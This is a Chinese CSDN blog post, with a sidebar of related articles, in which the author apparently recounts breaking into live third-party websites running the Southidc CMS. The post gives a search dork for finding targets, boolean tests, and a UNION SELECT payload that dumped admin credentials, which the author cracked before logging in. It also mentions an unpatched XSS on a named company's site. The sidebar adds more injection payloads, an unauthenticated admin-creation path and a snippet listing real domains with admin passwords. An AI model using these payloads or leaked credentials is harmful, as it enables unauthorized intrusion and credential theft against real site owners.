SQL注入之南方0day

最新推荐文章于 2021-06-24 09:53:09 发布
最新推荐文章于 2021-06-24 09:53:09 发布
阅读量2.8k 收藏 2
点赞数
分类专栏: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shuaicenglou3032/article/details/79995952
版权

关键词:     inurl:"HomeMarket.asp"

第一个杭州开泰实际上已经不能愉快的玩耍了,于是很幸运的找到一个可以拿来玩耍的,具体不上图。

当然,登进去后看了看后台的ip记录,也已经被光顾了无数次,都快被玩烂了

剩下的一些要么装了安全狗,要么就是创宇的防火墙。

另外测了一下杭州开泰那个网站的“联系我们”的XSS,依然存在。

效果如图:

接下来记录一下另一个站的注入:

首先,在首页后加NewsType.asp?SmallClass=%27%20and%20%271%27=%271,发现正常。

然后构造如下注入NewsType.asp?SmallClass=%27%20and%20%271%27=%272,报错。

之后照着教程输入'    and    1=2    union    select    1,2,3,4,5,6,7,8,9,0    from    admin    where    '1'='1

发现无卵用,于是猜想admin的表结构改了,于是将0改为10,并加到11,然后账号和密码就爆出来了,送到SOMD5破解之后就登上去了。只不过我没继续上传一句话尝试拿shell。教程毕竟是教程,新手学习千万不能生搬硬套,得针对情况作出改变。

KogRow
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
靶机-南方数据站源代码存在cookie注入
05-09
靶机-南方数据站源代码存在cookie注入!网站对get和post请求的参数进行过滤,请使用burpsuite修改cookie进行注入!
利用南方数据企业0day漏洞批量入侵
04-24
利用南方数据企业0day漏洞批量入侵
南方数据企业网站管理系统源码包-存有sql注入漏洞与数据库备份getshell漏洞.zip
01-05
南方数据企业网站管理系统-存有sql注入漏洞与数据库备份getshell漏洞,如有侵权,请联系CSDN管理员删除即可
南方数据企业0day
qq_48806485的博客
06-24 223
南方数据企业0day 漏洞影响版本 v10.0 v11.0 关键字:inurl:”HomeMarket.asp” 默认后台:/admin 直接爆用户密码: http://www.xxx.com/NewsType.asp?SmallClass=’%20union%20select%200,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9%20from%20admin%20union%20select%20*%20from%20news%20where%201=2%2
南方数据编辑器southidceditor最新注入0day漏洞
fengling132的专栏
06-30 6099
1.注入点:news_search.asp?key=7%' union select 0,username%2BCHR(124)%2Bpassword,2,3,4,5,6,7,8,9 from admin where 1 or '%'='&otype=title&Submit=%CB%D1%CB%F7 直接暴管理员帐号密码(md5) 2.登陆后台 3.利用编辑器上传: 访问
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sql注入攻击流量情况
07-18
sql注入攻击流量情况
sql注入绕过方法总结
最新发布
12-19
sql注入绕过方法总结,绕过waf,D盾
Sql server之sql注入
12-14
 关于sql注入的危害在这里不多做介绍了,相信大家也知道其中的厉害关系。这里有一些sql注入的事件大家感兴趣可以看一下  防范sql注入的方法无非有以下几种:  1.使用类型安全的SQL参数  2.使用参数化输入...
cookie-sql-南方数据网站
10-05
这是一个存在漏洞的网页,它可用于获取cookie来进行SQL注入,很方便。
通杀良精南方数据网软上传漏洞
12-16
通杀良精南方数据网软上传漏洞通杀良精南方数据网软上传漏洞通杀良精南方数据网软上传漏洞
南方数据漏洞爆破工具.rar
06-01
适合刚学网站渗透的新手、每天弄几个shell应该不是问题!详细用法见工具上说明,此工具为易语言打造,你懂的!
南方数据漏洞 想拿shell的就下吧
06-28
南方数据漏洞 感觉还不错!!!!
存在cookie注入南方数据cms
04-24
Windows2008建站不成功,显示不出来,最好用win10吧,win10显示正常
南方数据管理员添加未授权访问漏洞
番薯道长的博客
11-19 1865
南方数据注入漏洞基本都知道了 现在是个所谓的黑客出两套教程里面必有这个漏洞的教程。 但是这个方法经常遇到解不出管理员MD5的情况,其实存在注入漏洞 一般未授权访问漏洞也没修复。 /admin/adminmailto.asp 直接访问 网页文章空白 可以ctrl+a 全选网页就能看见了 然后自行添加一个管理员帐号即可 还有admin路径是后台路径 比如后台地址被修
南方精良系统-不完全版
冰雪的专栏
12-20 1212
http://www.excelltel.com admin   l1102m550h     http://xilematj.com.cn mazong   mazong密码都一样,呵呵   http://www.yixianggyp.com admin  yixiang123   我们接下来扫下后台,然后登陆后台, 先从第一个来,用御剑后台扫描 在扫的时
通杀良精南方数据网软上传漏洞工具
02-16
具体漏洞文件路径要在源代码中修改![upfile_other.asp]上传木马文件记得加空格
大哥带我走渗透5--南方数据
05-31 277
1.用脚都知道,这次的注入肯定不简单。果然,添加了无数的坑[哭泣委屈],不过还是谢谢大哥,如果没有他,我们根本不能有这么好的学习环境。好好加油吧。果然,设置了黑名单。加入黑名单的有我们的and还有; ;;; 所以我们要变一下身:And...居然大写也不行。。。a/**/nd也不行。。。。andand也不行。。。一看 ,,别人是黑名单。。我在想啥子。。。。 所以构造语句: &...
网络安全技术13SQL注入.pptx
11-12
"网络安全技术13SQL注入.pptx" 这篇资源主要讲解了网络安全中的一个关键议题——SQL注入,这是针对Web服务器的一种常见攻击手段。SQL注入是指攻击者通过输入恶意的SQL语句,利用Web应用程序的安全漏洞,篡改数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值